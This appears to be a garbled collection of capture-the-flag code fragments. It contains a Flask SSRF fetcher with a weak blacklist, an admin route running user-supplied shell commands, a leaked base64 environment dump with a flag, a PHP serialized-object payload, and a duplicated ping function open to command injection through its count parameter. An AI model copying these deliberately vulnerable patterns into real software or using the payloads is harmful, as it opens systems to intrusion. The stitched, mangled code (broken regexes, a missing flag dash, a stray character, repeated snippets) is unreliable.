from flask import render_template,render_template_string,Flask,request from urllib.parse import urlparse import urllib.request import random import os import subprocess import base64 app=Flask(__name__) app.secret_key=os.urandom(16)
@app.route('/',methods=['GET','POST']) def home(): if request.method=='GET': return render_template('home.html') if request.method=='POST': try: url=request.form.get('url') scheme=urlparse(url).scheme hostname=urlparse(url).hostname blacklist_scheme=['file','gopher','php','ftp','dict','data'] blacklist_hostname=['127.0.0.1','localhost','0.0.0.0','::1','::ffff:127.0.0.1'] if scheme in blacklist_scheme: return render_template_string('blocked scheme') if hostname in blacklist_hostname: return render_template_string('blocked host') t=urllib.request.urlopen(url) content = t.read() output=base64.b64encode(content) return (f'''base64 version of the site: {output[:1000]}''') except Exception as e: print(e) return f" An error occurred: {e} - Unable to visit this site, try some other website."
@app.route('/admin') def admin(): remote_addr = request.remote_addr if remote_addr in ['127.0.0.1', 'localhost']: cmd=request.args.get('cmd','id') cmd_blacklist=['REDACTED'] if "'" in cmd or '"' in cmd: return render_template_string('Command blocked') for i in cmd_blacklist: if i in cmd: return render_template_string('Command blocked') print(f"Executing: {cmd}") res= subprocess.run(cmd, shell=True, capture_output=True, text=True) return res.stdout else: return render_template_string("Don't hack me")
if __name__=="__main__": app.run(host='0.0.0.0',port='5000')
出:base64 version of the site: b’U0hMVkw9MQpPTERQV0Q9LwpMQ19DVFlQRT1DLlVURi04CldFUktaRVVHX1NFUlZFUl9GRD0zCmZsYWc9aXJvbkNURnt5MHU0cjNyMGNrMW42azMzcGg0Y2sxbjZ9Cl89L3Vzci9sb2NhbC9iaW4vcHl0aG9uClBXRD0vaG9tZS91c2VyCg==’
<?php class Admin { public $is_admin = 0; public $your_secret = ""; public $my_secret = ""; public function __construct() { $this->my_secret = 'a'; $this->your_secret = &$this->my_secret; } public function __toString() { return $this->is_admin; } } echo base64_encode(serialize(new Admin())); ?>
def ping_ip(ip, count): if re.match(r'^((25[05]|(2[04]|1\d|[19]|)\d)\.?\b){4}$', ip): return subprocess.check_output(f"ping c {count} {ip}", shell=True).decode() else: return "Invalid ip address and count!"
@app.route('/admin_panel', methods=['GET', 'POST']) def admin_panel(): if 'logged_in' not in session: return redirect(url_for('admin')) ping_result = None if request.method == 'POST': ip = request.form.get('ip') count = request.form.get('count', 1) try: ping_result = ping_ip(ip, count) except ValueError: flash("Count must be a valid integer") except Exception as e: flash(f"An error occurred: {e}")
def ping_ip(ip, count): if re.match(r'^((25[05]|(2[04]|1\d|[19]|)\d)\.?\b){4}$', ip): return subprocess.check_output(f"ping c {count} {ip}", shell=True).decode() else: return "Invalid ip address and count!"